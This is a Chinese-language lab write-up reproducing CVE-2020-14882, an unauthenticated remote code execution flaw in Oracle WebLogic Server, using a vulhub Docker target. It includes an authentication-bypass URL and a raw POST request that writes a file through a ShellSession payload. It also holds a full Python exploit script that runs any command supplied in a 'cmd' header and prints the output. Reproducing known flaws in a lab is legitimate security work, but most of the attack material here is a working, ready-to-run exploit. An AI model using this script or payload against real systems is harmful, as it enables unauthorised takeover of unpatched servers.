漏洞概述
未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。
漏洞影响范围
Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
环境搭建
使用vulhub靶场
搭建vulhub靶场参考文章:vulhub
进到vulhub目录
cd vulhub
cd weblogic/
cd CVE-2020-14882/
运行靶场
docker-compose up -d
查看启动环境
docker-compose ps
复现完成后移除环境
docker-compose down
漏洞复现
访问http://192.168.19.129:7001/console
出现登录页面证明搭建成功
构造poc未授权访问后台地址
http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
抓包构造POC写入文件
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 192.168.19.129:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/123.txt');")
进入搭建的服务器容器查看文件是否写入
docker ps
docker exec -it e3fec34c620d bash
cd /tmp
ls
文件已经被写入
利用工具
地址:https://github.com/GGyao/CVE-2020-14882_ALL
利用脚本
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: zhzyker
# from: https://github.com/zhzyker/vulmap
# from: https://github.com/zhzyker/exphub
import http.client
import requests
import sys
import argparse
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
payload_cve_2020_14882_v12 = ('_nfpb=true&_pageLabel=&handle='
'com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = '
'(weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = '
'executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField'
'("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet'
'.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) '
'obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); '
'String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]'
'{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result '
'= new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter'
'("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.'
'ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);'
'res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));'
'res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); ");')
def cve_2020_14882(url, cmd):
payload = payload_cve_2020_14882_v12
path = "/console/css/%252e%252e%252fconsole.portal"
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,'
'application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded',
'cmd': cmd
}
try:
request = requests.post(url + path, data=payload, headers=headers, timeout=10, verify=False)
print(request.text)
except Exception as error:
print("[-] Vuln Check Failed... ...")
print("[-] More Weblogic vulnerabilities in https://github.com/zhzyker/vulmap")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Weblogic cve-2020-14882',
usage='use "python %(prog)s --help" for more information',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("-u", "--url",
dest="url",
help="target url (http://192.168.19.129:7001/)"
)
parser.add_argument("-c", "--cmd",
dest="cmd",
help="command"
)
args = parser.parse_args()
if not args.url or not args.cmd:
sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-14882_rce.py -u http://192.168.19.129:7001/ -c whoami')
cve_2020_14882(args.url, args.cmd)
修改url